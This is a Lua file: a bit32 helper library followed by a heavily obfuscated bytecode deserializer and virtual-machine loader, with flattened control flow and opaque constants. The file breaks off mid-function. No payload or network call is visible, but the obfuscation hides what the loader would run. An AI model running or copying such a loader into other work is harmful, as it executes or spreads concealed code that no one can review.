bit32 = {};
local N = 32;
local P = 2 ^ N;
bit32.bnot = function(x)
	x = x % P;
	return (P - 1) - x;
end;
bit32.band = function(x, y)
	if (y == 255) then
		return x % 256;
	end
	if (y == 65535) then
		return x % 65536;
	end
	if (y == 4294967295) then
		return x % 4294967296;
	end
	x, y = x % P, y % P;
	local r = 0;
	local p = 1;
	for i = 1, N do
		local a, b = x % 2, y % 2;
		x, y = math.floor(x / 2), math.floor(y / 2);
		if ((a + b) == 2) then
			r = r + p;
		end
		p = 2 * p;
	end
	return r;
end;
bit32.bor = function(x, y)
	if (y == 255) then
		return (x - (x % 256)) + 255;
	end
	if (y == 65535) then
		return (x - (x % 65536)) + 65535;
	end
	if (y == 4294967295) then
		return 4294967295;
	end
	x, y = x % P, y % P;
	local r = 0;
	local p = 1;
	for i = 1, N do
		local a, b = x % 2, y % 2;
		x, y = math.floor(x / 2), math.floor(y / 2);
		if ((a + b) >= 1) then
			r = r + p;
		end
		p = 2 * p;
	end
	return r;
end;
bit32.bxor = function(x, y)
	x, y = x % P, y % P;
	local r = 0;
	local p = 1;
	for i = 1, N do
		local a, b = x % 2, y % 2;
		x, y = math.floor(x / 2), math.floor(y / 2);
		if ((a + b) == 1) then
			r = r + p;
		end
		p = 2 * p;
	end
	return r;
end;
bit32.lshift = function(x, s_amount)
	if (math.abs(s_amount) >= N) then
		return 0;
	end
	x = x % P;
	if (s_amount < 0) then
		return math.floor(x * (2 ^ s_amount));
	else
		return (x * (2 ^ s_amount)) % P;
	end
end;
bit32.rshift = function(x, s_amount)
	if (math.abs(s_amount) >= N) then
		return 0;
	end
	x = x % P;
	if (s_amount > 0) then
		return math.floor(x * (2 ^ -s_amount));
	else
		return (x * (2 ^ -s_amount)) % P;
	end
end;
bit32.arshift = function(x, s_amount)
	if (math.abs(s_amount) >= N) then
		return 0;
	end
	x = x % P;
	if (s_amount > 0) then
		local add = 0;
		if (x >= (P / 2)) then
			add = P - (2 ^ (N - s_amount));
		end
		return math.floor(x * (2 ^ -s_amount)) + add;
	else
		return (x * (2 ^ -s_amount)) % P;
	end
end;
local TABLE_TableIndirection = {};
TABLE_TableIndirection["v0%0"] = tonumber;
TABLE_TableIndirection["v1%0"] = string.byte;
TABLE_TableIndirection["v2%0"] = string.char;
TABLE_TableIndirection["v3%0"] = string.sub;
TABLE_TableIndirection["v4%0"] = string.gsub;
TABLE_TableIndirection["v5%0"] = string.rep;
TABLE_TableIndirection["v6%0"] = table.concat;
TABLE_TableIndirection["v7%0"] = table.insert;
TABLE_TableIndirection["v8%0"] = math.ldexp;
TABLE_TableIndirection["v9%0"] = getfenv or function()
	return _ENV;
end;
TABLE_TableIndirection["v10%0"] = setmetatable;
TABLE_TableIndirection["v11%0"] = pcall;
TABLE_TableIndirection["v12%0"] = select;
TABLE_TableIndirection["v13%0"] = unpack or table.unpack;
TABLE_TableIndirection["v14%0"] = tonumber;
local function v15(v16, v17, ...)
	TABLE_TableIndirection["v18%0"] = 1;
	TABLE_TableIndirection["v19%0"] = nil;
	v16 = TABLE_TableIndirection["v4%0"](TABLE_TableIndirection["v3%0"](v16, 5), "..", function(v30)
		if ((TABLE_TableIndirection["v1%0"](v30, 2) == 81) or (4593 <= 2672)) then
			TABLE_TableIndirection["v81%0"] = 0;
			while true do
				if (TABLE_TableIndirection["v81%0"] == 0) then
					TABLE_TableIndirection["FlatIdent_24A02%0"] = 0;
					while true do
						if (TABLE_TableIndirection["FlatIdent_24A02%0"] == 0) then
							TABLE_TableIndirection["v19%0"] = TABLE_TableIndirection["v0%0"](TABLE_TableIndirection["v3%0"](v30, 1, 1));
							return "";
						end
					end
				end
			end
		else
			TABLE_TableIndirection["FlatIdent_7126A%0"] = 0;
			TABLE_TableIndirection["v82%0"] = nil;
			while true do
				if (TABLE_TableIndirection["FlatIdent_7126A%0"] == 0) then
					TABLE_TableIndirection["v82%0"] = TABLE_TableIndirection["v2%0"](TABLE_TableIndirection["v0%0"](v30, 16));
					if TABLE_TableIndirection["v19%0"] then
						TABLE_TableIndirection["v88%0"] = TABLE_TableIndirection["v5%0"](TABLE_TableIndirection["v82%0"], TABLE_TableIndirection["v19%0"]);
						TABLE_TableIndirection["v19%0"] = nil;
						return TABLE_TableIndirection["v88%0"];
					else
						return TABLE_TableIndirection["v82%0"];
					end
					break;
				end
			end
		end
	end);
	local function v20(v31, v32, v33)
		if (v33 or (1168 > 3156)) then
			TABLE_TableIndirection["FlatIdent_12703%0"] = 0;
			TABLE_TableIndirection["v83%0"] = nil;
			while true do
				if (TABLE_TableIndirection["FlatIdent_12703%0"] == 0) then
					TABLE_TableIndirection["v83%0"] = (v31 / ((570 - ((1597 - 1230) + 201)) ^ (v32 - (928 - (214 + (1983 - (226 + 1044))))))) % ((1 + 1) ^ (((v33 - ((119 - (32 + 85)) - 1)) - (v32 - (2 - 1))) + (1 - 0)));
					return TABLE_TableIndirection["v83%0"] - (TABLE_TableIndirection["v83%0"] % 1);
				end
			end
		else
			TABLE_TableIndirection["FlatIdent_2BD95%0"] = 0;
			TABLE_TableIndirection["v84%0"] = nil;
			while true do
				if (TABLE_TableIndirection["FlatIdent_2BD95%0"] == 0) then
					TABLE_TableIndirection["v84%0"] = (4 - 2) ^ (v32 - 1);
					return (((v31 % (TABLE_TableIndirection["v84%0"] + TABLE_TableIndirection["v84%0"])) >= TABLE_TableIndirection["v84%0"]) and (620 - (544 + 11 + 64))) or (931 - (857 + 17 + 57));
				end
			end
		end
	end
	local function v21()
		TABLE_TableIndirection["FlatIdent_23BE8%0"] = 0;
		TABLE_TableIndirection["v34%0"] = nil;
		while true do
			if (1 == TABLE_TableIndirection["FlatIdent_23BE8%0"]) then
				return TABLE_TableIndirection["v34%0"];
			end
			if (TABLE_TableIndirection["FlatIdent_23BE8%0"] == 0) then
				TABLE_TableIndirection["v34%0"] = TABLE_TableIndirection["v1%0"](v16, TABLE_TableIndirection["v18%0"], TABLE_TableIndirection["v18%0"]);
				TABLE_TableIndirection["v18%0"] = TABLE_TableIndirection["v18%0"] + 1;
				TABLE_TableIndirection["FlatIdent_23BE8%0"] = 1;
			end
		end
	end
	local function v22()
		TABLE_TableIndirection["v35%0"] = 957 - (892 + 65);
		TABLE_TableIndirection["v36%0"] = nil;
		TABLE_TableIndirection["v37%0"] = nil;
		while true do
			if ((TABLE_TableIndirection["v35%0"] == (0 - (0 + 0))) or (572 > 4486)) then
				TABLE_TableIndirection["FlatIdent_31A5A%0"] = 0;
				while true do
					if (TABLE_TableIndirection["FlatIdent_31A5A%0"] == 1) then
						TABLE_TableIndirection["v35%0"] = 1 - 0;
						break;
					end
					if (TABLE_TableIndirection["FlatIdent_31A5A%0"] == 0) then
						TABLE_TableIndirection["v36%0"], TABLE_TableIndirection["v37%0"] = TABLE_TableIndirection["v1%0"](v16, TABLE_TableIndirection["v18%0"], TABLE_TableIndirection["v18%0"] + (4 - 2));
						TABLE_TableIndirection["v18%0"] = TABLE_TableIndirection["v18%0"] + (3 - 1);
						TABLE_TableIndirection["FlatIdent_31A5A%0"] = 1;
					end
				end
			end
			if ((1404 == 1404) and (TABLE_TableIndirection["v35%0"] == (351 - (64 + 23 + 263)))) then
				return (TABLE_TableIndirection["v37%0"] * (436 - (67 + 113))) + TABLE_TableIndirection["v36%0"];
			end
		end
	end
	local function v23()
		TABLE_TableIndirection["FlatIdent_31905%0"] = 0;
		TABLE_TableIndirection["v38%0"] = nil;
		TABLE_TableIndirection["v39%0"] = nil;
		TABLE_TableIndirection["v40%0"] = nil;
		TABLE_TableIndirection["v41%0"] = nil;
		while true do
			if (TABLE_TableIndirection["FlatIdent_31905%0"] == 1) then
				return (TABLE_TableIndirection["v41%0"] * 16777216) + (TABLE_TableIndirection["v40%0"] * (66488 - (802 + 150))) + (TABLE_TableIndirection["v39%0"] * (689 - 433)) + TABLE_TableIndirection["v38%0"];
			end
			if (0 == TABLE_TableIndirection["FlatIdent_31905%0"]) then
				TABLE_TableIndirection["v38%0"], TABLE_TableIndirection["v39%0"], TABLE_TableIndirection["v40%0"], TABLE_TableIndirection["v41%0"] = TABLE_TableIndirection["v1%0"](v16, TABLE_TableIndirection["v18%0"], TABLE_TableIndirection["v18%0"] + (11 - 8));
				TABLE_TableIndirection["v18%0"] = TABLE_TableIndirection["v18%0"] + 4;
				TABLE_TableIndirection["FlatIdent_31905%0"] = 1;
			end
		end
	end
	local function v24()
		TABLE_TableIndirection["v42%0"] = v23();
		TABLE_TableIndirection["v43%0"] = v23();
		TABLE_TableIndirection["v44%0"] = 1 - 0;
		TABLE_TableIndirection["v45%0"] = (v20(TABLE_TableIndirection["v43%0"], 1, 20) * ((2 + 0) ^ (1029 - (915 + 82)))) + TABLE_TableIndirection["v42%0"];
		TABLE_TableIndirection["v46%0"] = v20(TABLE_TableIndirection["v43%0"], (35 - 25) + (870 - (814 + 45)), 54 - (56 - 33));
		TABLE_TableIndirection["v47%0"] = ((v20(TABLE_TableIndirection["v43%0"], 90 - (241 - 183)) == (1 + 0)) and -(1 - 0)) or (1188 - (1069 + 118));
		if (TABLE_TableIndirection["v46%0"] == (0 - 0)) then
			if ((TABLE_TableIndirection["v45%0"] == 0) or (3748 < 2212)) then
				return TABLE_TableIndirection["v47%0"] * (0 + 0);
			else
				TABLE_TableIndirection["v46%0"] = 1 - (0 + 0);
				TABLE_TableIndirection["v44%0"] = 0 + 0;
			end
		elseif ((TABLE_TableIndirection["v46%0"] == 2047) or (1180 == 2180)) then
			return ((TABLE_TableIndirection["v45%0"] == (0 - 0)) and (TABLE_TableIndirection["v47%0"] * (((3 - 2) + 0) / (791 - (368 + 423))))) or (TABLE_TableIndirection["v47%0"] * NaN);
		end
		return TABLE_TableIndirection["v8%0"](TABLE_TableIndirection["v47%0"], TABLE_TableIndirection["v46%0"] - (3214 - 2191)) * (TABLE_TableIndirection["v44%0"] + (TABLE_TableIndirection["v45%0"] / (2 ^ (70 - (10 + 8)))));
	end
	local function v25(v48)
		TABLE_TableIndirection["v49%0"] = 885 - (261 + 624);
		TABLE_TableIndirection["v50%0"] = nil;
		TABLE_TableIndirection["v51%0"] = nil;
		while true do
			TABLE_TableIndirection["FlatIdent_61B23%0"] = 0;
			while true do
				if (TABLE_TableIndirection["FlatIdent_61B23%0"] == 0) then
					if ((4090 < 4653) and (TABLE_TableIndirection["v49%0"] == (4 - 1))) then
						return TABLE_TableIndirection["v6%0"](TABLE_TableIndirection["v51%0"]);
					end
					if ((TABLE_TableIndirection["v49%0"] == (1081 - (1020 + 60))) or (2652 < 196)) then
						TABLE_TableIndirection["FlatIdent_946F%0"] = 0;
						while true do
							if (TABLE_TableIndirection["FlatIdent_946F%0"] == 0) then
								TABLE_TableIndirection["v50%0"] = TABLE_TableIndirection["v3%0"](v16, TABLE_TableIndirection["v18%0"], (TABLE_TableIndirection["v18%0"] + v48) - (1424 - (630 + (2706 - (1789 + 124)))));
								TABLE_TableIndirection["v18%0"] = TABLE_TableIndirection["v18%0"] + v48;
								TABLE_TableIndirection["FlatIdent_946F%0"] = 1;
							end
							if (TABLE_TableIndirection["FlatIdent_946F%0"] == 1) then
								TABLE_TableIndirection["v49%0"] = 6 - (770 - (745 + 21));
								break;
							end
						end
					end
					TABLE_TableIndirection["FlatIdent_61B23%0"] = 1;
				end
				if (TABLE_TableIndirection["FlatIdent_61B23%0"] == 1) then
					if (TABLE_TableIndirection["v49%0"] ~= 2) then
					else
						TABLE_TableIndirection["v51%0"] = {};
						for v89 = 4 - 3, #TABLE_TableIndirection["v50%0"] do
							TABLE_TableIndirection["v51%0"][v89] = TABLE_TableIndirection["v2%0"](TABLE_TableIndirection["v1%0"](TABLE_TableIndirection["v3%0"](TABLE_TableIndirection["v50%0"], v89, v89)));
						end
						TABLE_TableIndirection["v49%0"] = 2 + 1;
					end
					if (TABLE_TableIndirection["v49%0"] ~= (0 - 0)) then
					else
						TABLE_TableIndirection["FlatIdent_49AED%0"] = 0;
						while true do
							if (TABLE_TableIndirection["FlatIdent_49AED%0"] == 1) then
								TABLE_TableIndirection["v49%0"] = 1748 - (262 + 498 + (2715 - 1728));
								break;
							end
							if (TABLE_TableIndirection["FlatIdent_49AED%0"] == 0) then
								TABLE_TableIndirection["v50%0"] = nil;
								if ((4135 < 4817) and not v48) then
									v48 = v23();
									if (v48 ~= 0) then
									else
										return "";
									end
								end
								TABLE_TableIndirection["FlatIdent_49AED%0"] = 1;
							end
						end
					end
					break;
				end
			end
		end
	end
	TABLE_TableIndirection["v26%0"] = v23;
	local function v27(...)
		return {...}, TABLE_TableIndirection["v12%0"]("#", ...);
	end
	local function v28()
		TABLE_TableIndirection["FlatIdent_65290%0"] = 0;
		TABLE_TableIndirection["v52%0"] = nil;
		TABLE_TableIndirection["v53%0"] = nil;
		TABLE_TableIndirection["v54%0"] = nil;
		TABLE_TableIndirection["v55%0"] = nil;
		TABLE_TableIndirection["v56%0"] = nil;
		TABLE_TableIndirection["v57%0"] = nil;
		TABLE_TableIndirection["v58%0"] = nil;
		TABLE_TableIndirection["v59%0"] = nil;
		while true do
			if (TABLE_TableIndirection["FlatIdent_65290%0"] == 2) then
				TABLE_TableIndirection["v56%0"] = (function()
					return;
				end)();
				TABLE_TableIndirection["v57%0"] = (function()
					return;
				end)();
				TABLE_TableIndirection["FlatIdent_65290%0"] = 3;
			end
			if (TABLE_TableIndirection["FlatIdent_65290%0"] == 4) then
				while true do
					TABLE_TableIndirection["v66%0"] = (function()
						return 0 + 0;
					end)();
					while true do
						if ((272 == 272) and (TABLE_TableIndirection["v66%0"] == 0)) then
							if (TABLE_TableIndirection["v52%0"] == 1) then
								TABLE_TableIndirection["v95%0"] = (function()
									return 0 - 0;
								end)();
								while true do
									if ((100 <= 3123) and (2 ~= TABLE_TableIndirection["v95%0"])) then
									else
										TABLE_TableIndirection["v52%0"] = (function()
											return 2;
										end)();
										break;
									end
									if ((TABLE_TableIndirection["v95%0"] == 1) or (1369 > 4987)) then
										TABLE_TableIndirection["v59%0"] = (function()
											return {};
										end)();
										for v116 = #"<", TABLE_TableIndirection["v58%0"] do
											TABLE_TableIndirection["v117%0"] = (function()
												return 1467 - (899 + 568);
											end)();
											TABLE_TableIndirection["v118%0"] = (function()
												return;
											end)();
											TABLE_TableIndirection["v119%0"] = (function()
												return;
											end)();
											TABLE_TableIndirection["v120%0"] = (function()
												return;
											end)();
											while true do
												if ((1 ~= TABLE_TableIndirection["v117%0"]) or (863 >= 4584)) then
												else
													TABLE_TableIndirection["v120%0"] = (function()
														return nil;
													end)();
													while true do
														if ((TABLE_TableIndirection["v118%0"] ~= 0) or (724 >= 1668)) then
														else
															TABLE_TableIndirection["v164%0"] = (function()
																return 0;
															end)();
															TABLE_TableIndirection["v165%0"] = (function()
																return;
															end)();
															while true do
																if ((428 < 1804) and (TABLE_TableIndirection["v164%0"] == (0 + 0))) then
																	TABLE_TableIndirection["v165%0"] = (function()
																		return 0 - 0;
																	end)();
																	while true do
																		if (TABLE_TableIndirection["v165%0"] == (604 - (268 + 335))) then
																			TABLE_TableIndirection["v118%0"] = (function()
																				return 1;
																			end)();
																			break;
																		end
																		if (TABLE_TableIndirection["v165%0"] ~= (290 - (60 + 230))) then
																		else
																			TABLE_TableIndirection["FlatIdent_8BF78%0"] = 0;
																			while true do
																				if (TABLE_TableIndirection["FlatIdent_8BF78%0"] == 0) then
																					TABLE_TableIndirection["v119%0"] = (function()
																						return v21();
																					end)();
																					TABLE_TableIndirection["v120%0"] = (function()
																						return nil;
																					end)();
																					TABLE_TableIndirection["FlatIdent_8BF78%0"] = 1;
																				end
																				if (1 == TABLE_TableIndirection["FlatIdent_8BF78%0"]) then
																					TABLE_TableIndirection["v165%0"] = (function()
																						return 573 - (426 + 146);
																					end)();
																					break;
																				end
																			end
																		end
																	end
																	break;
																end
															end
														end
														if ((TABLE_TableIndirection["v118%0"] == (1 + 0)) or (3325 > 4613)) then
															if ((TABLE_TableIndirection["v119%0"] == #"|") or (4950 <= 4553)) then
																TABLE_TableIndirection["v120%0"] = (function()
																	return v21() ~= (1456 - (282 + 1174));
																end)();
															elseif ((2665 <= 3933) and (TABLE_TableIndirection["v119%0"] == (813 - (569 + 242)))) then
																TABLE_TableIndirection["v120%0"] = (function()
																	return v24();
																end)();
															elseif (TABLE_TableIndirection["v119%0"] ~= #"xxx") then
															else
																TABLE_TableIndirection["v120%0"] = (function()
																	return v25();
																end)();
															end
															TABLE_TableIndirection["v59%0"][v116] = (function()
																return TABLE_TableIndirection["v120%0"];
															end)();
															break;
														end
													end
													break;
												end
												if ((3273 == 3273) and (0 ~= TABLE_TableIndirection["v117%0"])) then
												else
													TABLE_TableIndirection["v152%0"] = (function()
														return 0 - 0;
													end)();
													while true do
														if ((1 + 0) == TABLE_TableIndirection["v152%0"]) then
															TABLE_TableIndirection["v117%0"] = (function()
																return 1;
															end)();
															break;
														end
														if ((3824 > 409) and (0 == TABLE_TableIndirection["v152%0"])) then
															TABLE_TableIndirection["v118%0"] = (function()
																return 0;
															end)();
															TABLE_TableIndirection["v119%0"] = (function()
																return nil;
															end)();
															TABLE_TableIndirection["v152%0"] = (function()
																return 1025 - (706 + 318);
															end)();
														end
													end
												end
											end
										end
										TABLE_TableIndirection["v95%0"] = (function()
											return 1253 - (721 + 530);
										end)();
									end
									if ((2087 == 2087) and (TABLE_TableIndirection["v95%0"] ~= (1271 - (945 + 326)))) then
									else
										TABLE_TableIndirection["FlatIdent_52551%0"] = 0;
										while true do
											if (TABLE_TableIndirection["FlatIdent_52551%0"] == 0) then
												TABLE_TableIndirection["v57%0"] = (function()
													return {TABLE_TableIndirection["v54%0"],TABLE_TableIndirection["v55%0"],nil,TABLE_TableIndirection["v56%0"]};
												end)();
												TABLE_TableIndirection["v58%0"] = (function()
													return v23();
												end)();
												TABLE_TableIndirection["FlatIdent_52551%0"] = 1;
											end
											if (TABLE_TableIndirection["FlatIdent_52551%0"] == 1) then
												TABLE_TableIndirection["v95%0"] = (function()
													return 1;
												end)();
												break;
											end
										end
									end
								end
							end
							if (TABLE_TableIndirection["v52%0"] ~= 2) then
							else
								TABLE_TableIndirection["v57%0"][#"gha"] = (function()
									return v21();
								end)();
								for v97 = #":", v23() do
									TABLE_TableIndirection["v98%0"] = (function()
										return v21();
									end)();
									if (v20(TABLE_TableIndirection["v98%0"], #"<", #":") == (0 - 0)) then
										TABLE_TableIndirection["v109%0"] = (function()
											return 0 + 0;
										end)();
										TABLE_TableIndirection["v110%0"] = (function()
											return;
										end)();
										TABLE_TableIndirection["v111%0"] = (function()
											return;
										end)();
										TABLE_TableIndirection["v112%0"] = (function()
											return;
										end)();
										TABLE_TableIndirection["v113%0"] = (function()
											return;
										end)();
										while true do
											if (TABLE_TableIndirection["v109%0"] ~= (702 - (271 + 429))) then
											else
												while true do
													if ((TABLE_TableIndirection["v110%0"] ~= #"19(") or (3404 > 4503)) then
													else
														if (v20(TABLE_TableIndirection["v112%0"], #"91(", #"19(") ~= #"{") then
														else
															TABLE_TableIndirection["v113%0"][#"?id="] = (function()
																return TABLE_TableIndirection["v59%0"][TABLE_TableIndirection["v113%0"][#"http"]];
															end)();
														end
														TABLE_TableIndirection["v54%0"][v97] = (function()
															return TABLE_TableIndirection["v113%0"];
														end)();
														break;
													end
													if ((#"}" == TABLE_TableIndirection["v110%0"]) or (3506 <= 1309)) then
														TABLE_TableIndirection["FlatIdent_61EE%0"] = 0;
														TABLE_TableIndirection["v159%0"] = nil;
														TABLE_TableIndirection["v160%0"] = nil;
														while true do
															if (0 == TABLE_TableIndirection["FlatIdent_61EE%0"]) then
																TABLE_TableIndirection["v159%0"] = (function()
																	return 0 + 0;
																end)();
																TABLE_TableIndirection["v160%0"] = (function()
																	return;
																end)();
																TABLE_TableIndirection["FlatIdent_61EE%0"] = 1;
															end
															if (1 == TABLE_TableIndirection["FlatIdent_61EE%0"]) then
																while true do
																	if ((2955 == 2955) and (TABLE_TableIndirection["v159%0"] == (1500 - (1408 + 92)))) then
																		TABLE_TableIndirection["v160%0"] = (function()
																			return 1086 - (461 + 625);
																		end)();
																		while true do
																			if (TABLE_TableIndirection["v160%0"] ~= (1288 - (993 + 295))) then
																			else
																				TABLE_TableIndirection["v113%0"] = (function()
																					return {v22(),v22(),nil,nil};
																				end)();
																				if ((TABLE_TableIndirection["v111%0"] == (0 + 0)) or (2903 == 1495)) then
																					TABLE_TableIndirection["v171%0"] = (function()
																						return 1171 - (418 + 753);
																					end)();
																					TABLE_TableIndirection["v172%0"] = (function()
																						return;
																					end)();
																					while true do
																						if ((4546 >= 2275) and (TABLE_TableIndirection["v171%0"] == 0)) then
																							TABLE_TableIndirection["v172%0"] = (function()
																								return 0;
																							end)();
																							while true do
																								if (0 ~= TABLE_TableIndirection["v172%0"]) then
																								else
																									TABLE_TableIndirection["v113%0"][#"nil"] = (function()
																										return v22();
																									end)();
																									TABLE_TableIndirection["v113%0"][#"asd1"] = (function()
																										return v22();
																									end)();
																									break;
																								end
																							end
																							break;
																						end
																					end
																				elseif (TABLE_TableIndirection["v111%0"] == #"~") then
																					TABLE_TableIndirection["v113%0"][#"19("] = (function()
																						return v23();
																					end)();
																				elseif ((819 >= 22) and (TABLE_TableIndirection["v111%0"] == 2)) then
																					TABLE_TableIndirection["v113%0"][#"asd"] = (function()
																						return v23() - ((1 + 1) ^ (2 + 14));
																					end)();
																				elseif ((3162 == 3162) and (TABLE_TableIndirection["v111%0"] ~= #"asd")) then
																				else
																					TABLE_TableIndirection["v177%0"] = (function()
																						return 0;
																					end)();
																					TABLE_TableIndirection["v178%0"] = (function()
																						return;
																					end)();
																					while true do
																						if (0 == TABLE_TableIndirection["v177%0"]) then
																							TABLE_TableIndirection["v178%0"] = (function()
																								return 0;
																							end)();
																							while true do
																								if (((0 + 0) == TABLE_TableIndirection["v178%0"]) or (2369 > 4429)) then
																									TABLE_TableIndirection["v113%0"][#"19("] = (function()
																										return v23() - ((1 + 1) ^ 16);
																									end)();
																									TABLE_TableIndirection["v113%0"][#"http"] = (function()
																										return v22();
																									end)();
																									break;
																								end
																							end
																							break;
																						end
																					end
																				end
																				TABLE_TableIndirection["v160%0"] = (function()
																					return 530 - (406 + 123);
																				end)();
																			end
																			if ((4095 >= 3183) and ((1770 - (1749 + 20)) == TABLE_TableIndirection["v160%0"])) then
																				TABLE_TableIndirection["v110%0"] = (function()
																					return 1 + 1;
																				end)();
																				break;
																			end
																		end
																		break;
																	end
																end
																break;
															end
														end
													end
													if ((TABLE_TableIndirection["v110%0"] == (1322 - (1249 + 73))) or (3711 < 1008)) then
														TABLE_TableIndirection["FlatIdent_7F121%0"] = 0;
														TABLE_TableIndirection["v161%0"] = nil;
														TABLE_TableIndirection["v162%0"] = nil;
														while true do
															if (TABLE_TableIndirection["FlatIdent_7F121%0"] == 0) then
																TABLE_TableIndirection["v161%0"] = (function()
																	return 0 + 0;
																end)();
																TABLE_TableIndirection["v162%0"] = (function()
																	return;
																end)();
																TABLE_TableIndirection["FlatIdent_7F121%0"] = 1;
															end
															if (TABLE_TableIndirection["FlatIdent_7F121%0"] == 1) then
																while true do
																	if ((TABLE_TableIndirection["v161%0"] ~= (1145 - (466 + 679))) or (1049 <= 906)) then
																	else
																		TABLE_TableIndirection["v162%0"] = (function()
																			return 0 - 0;
																		end)();
																		while true do
																			if (TABLE_TableIndirection["v162%0"] ~= 1) then
																			else
																				TABLE_TableIndirection["v110%0"] = (function()
																					return #":";
																				end)();
																				break;
																			end
																			if ((4513 > 2726) and ((0 - 0) == TABLE_TableIndirection["v162%0"])) then
																				TABLE_TableIndirection["FlatIdent_3CF36%0"] = 0;
																				while true do
																					if (0 == TABLE_TableIndirection["FlatIdent_3CF36%0"]) then
																						TABLE_TableIndirection["v111%0"] = (function()
																							return v20(TABLE_TableIndirection["v98%0"], 2, #"-19");
																						end)();
																						TABLE_TableIndirection["v112%0"] = (function()
																							return v20(TABLE_TableIndirection["v98%0"], #"0313", 1906 - (106 + 1794));
																						end)();
																						TABLE_TableIndirection["FlatIdent_3CF36%0"] = 1;
																					end
																					if (TABLE_TableIndirection["FlatIdent_3CF36%0"] == 1) then
																						TABLE_TableIndirection["v162%0"] = (function()
																							return 1 + 0;
																						end)();
																						break;
																					end
																				end
																			end
																		end
																		break;
																	end
																end
																break;
															end
														end
													end
													if (TABLE_TableIndirection["v110%0"] ~= (1 + 1)) then
													else
														TABLE_TableIndirection["v163%0"] = (function()
															return 0 - 0;
														end)();
														while true do
															if (((2 - 1) == TABLE_TableIndirection["v163%0"]) or (1481 >= 2658)) then
																TABLE_TableIndirection["v110%0"] = (function()
																	return #"-19";
																end)();
																break;
															end
															if (TABLE_TableIndirection["v163%0"] ~= (114 - (4 + 110))) then
															else
																TABLE_TableIndirection["FlatIdent_45D37%0"] = 0;
																while true do
																	if (TABLE_TableIndirection["FlatIdent_45D37%0"] == 1) then
																		TABLE_TableIndirection["v163%0"] = (function()
																			return 1;
																		end)();
																		break;
																	end
																	if (TABLE_TableIndirection["FlatIdent_45D37%0"] == 0) then
																		if ((v20(TABLE_TableIndirection["v112%0"], #" ", #">") == #"[") or (3220 == 1364)) then
																			TABLE_TableIndirection["v113%0"][586 - (57 + 527)] = (function()
																				return TABLE_TableIndirection["v59%0"][TABLE_TableIndirection["v113%0"][2]];
																			end)();
																		end
																		if ((v20(TABLE_TableIndirection["v112%0"], 1429 - (41 + 1386), 105 - (17 + 86)) == #"[") or (1054 > 3392)) then
																			TABLE_TableIndirection["v113%0"][#"19("] = (function()
																				return TABLE_TableIndirection["v59%0"][TABLE_TableIndirection["v113%0"][#"nil"]];
																			end)();
																		end
																		TABLE_TableIndirection["FlatIdent_45D37%0"] = 1;
																	end
																end
															end
														end
													end
												end
												break;
											end
											if (TABLE_TableIndirection["v109%0"] ~= 1) then
											else
												TABLE_TableIndirection["v148%0"] = (function()
													return 0;
												end)();
												while true do
													if ((1 ~= TABLE_TableIndirection["v148%0"]) or (676 >= 1642)) then
													else
														TABLE_TableIndirection["v109%0"] = (function()
															return 2 + 0;
														end)();
														break;
													end
													if ((4136 > 2397) and (TABLE_TableIndirection["v148%0"] == (0 - 0))) then
														TABLE_TableIndirection["FlatIdent_494F6%0"] = 0;
														while true do
															if (TABLE_TableIndirection["FlatIdent_494F6%0"] == 0) then
																TABLE_TableIndirection["v112%0"] = (function()
																	return nil;
																end)();
																TABLE_TableIndirection["v113%0"] = (function()
																	return nil;
																end)();
																TABLE_TableIndirection["FlatIdent_494F6%0"] = 1;
															end
															if (TABLE_TableIndirection["FlatIdent_494F6%0"] == 1) then
																TABLE_TableIndirection["v148%0"] = (function()
																	return 1;
																end)();
																break;
															end
														end
													end
												end
											end
											if ((TABLE_TableIndirection["v109%0"] == (0 - 0)) or (4334 == 4245)) then
												TABLE_TableIndirection["FlatIdent_5EE26%0"] = 0;
												TABLE_TableIndirection["v149%0"] = nil;
												while true do
													if (TABLE_TableIndirection["FlatIdent_5EE26%0"] == 0) then
														TABLE_TableIndirection["v149%0"] = (function()
															return 166 - (122 + 44);
														end)();
														while true do
															if ((TABLE_TableIndirection["v149%0"] == (1 - 0)) or (4276 <= 3031)) then
																TABLE_TableIndirection["v109%0"] = (function()
																	return 3 - 2;
																end)();
																break;
															end
															if ((TABLE_TableIndirection["v149%0"] == 0) or (4782 <= 1199)) then
																TABLE_TableIndirection["FlatIdent_25A9F%0"] = 0;
																while true do
																	if (TABLE_TableIndirection["FlatIdent_25A9F%0"] == 0) then
																		TABLE_TableIndirection["v110%0"] = (function()
																			return 0;
																		end)();
																		TABLE_TableIndirection["v111%0"] = (function()
																			return nil;
																		end)();
																		TABLE_TableIndirection["FlatIdent_25A9F%0"] = 1;
																	end
																	if (TABLE_TableIndirection["FlatIdent_25A9F%0"] == 1) then
																		TABLE_TableIndirection["v149%0"] = (function()
																			return 1;
																		end)();
																		break;
																	end
																end
															end
														end
														break;
													end
												end
											end
										end
									end
								end
								for v99 = #">", v23() do
									TABLE_TableIndirection["v55%0"], v99, v28 = (function()
										return TABLE_TableIndirection["v53%0"](TABLE_TableIndirection["v55%0"], v99, v28);
									end)();
								end
								return TABLE_TableIndirection["v57%0"];
							end
							TABLE_TableIndirection["v66%0"] = (function()
								return 1;
							end)();
						end
						if (TABLE_TableIndirection["v66%0"] ~= 1) then
						else
							if (TABLE_TableIndirection["v52%0"] == (0 + 0)) then
								TABLE_TableIndirection["v53%0"] = (function()
									return function(v100, v101, v102)
										TABLE_TableIndirection["FlatIdent_691EB%0"] = 0;
										TABLE_TableIndirection["v103%0"] = nil;
										TABLE_TableIndirection["v104%0"] = nil;
										while true do
											if (TABLE_TableIndirection["FlatIdent_691EB%0"] == 1) then
												while true do
													if (TABLE_TableIndirection["v103%0"] ~= (0 + 0)) then
													else
														TABLE_TableIndirection["v104%0"] = (function()
															return 0 - 0;
														end)();
														while true do
															if ((TABLE_TableIndirection["v104%0"] ~= 0) or (4864 < 1902)) then
															else
																TABLE_TableIndirection["FlatIdent_1013A%0"] = 0;
																TABLE_TableIndirection["v154%0"] = nil;
																while true do
																	if (0 == TABLE_TableIndirection["FlatIdent_1013A%0"]) then
																		TABLE_TableIndirection["v154%0"] = (function()
																			return 0;
																		end)();
																		while true do
																			if ((4839 >= 3700) and ((65 - (30 + 35)) == TABLE_TableIndirection["v154%0"])) then
																				TABLE_TableIndirection["FlatIdent_77172%0"] = 0;
																				while true do
																					if (TABLE_TableIndirection["FlatIdent_77172%0"] == 0) then
																						v100[v101 - #"]"] = (function()
																							return v102();
																						end)();
																						return v100, v101, v102;
																					end
																				end
																			end
																		end
																		break;
																	end
																end
															end
														end
														break;
													end
												end
												break;
											end
											if (TABLE_TableIndirection["FlatIdent_691EB%0"] == 0) then
												TABLE_TableIndirection["v103%0"] = (function()
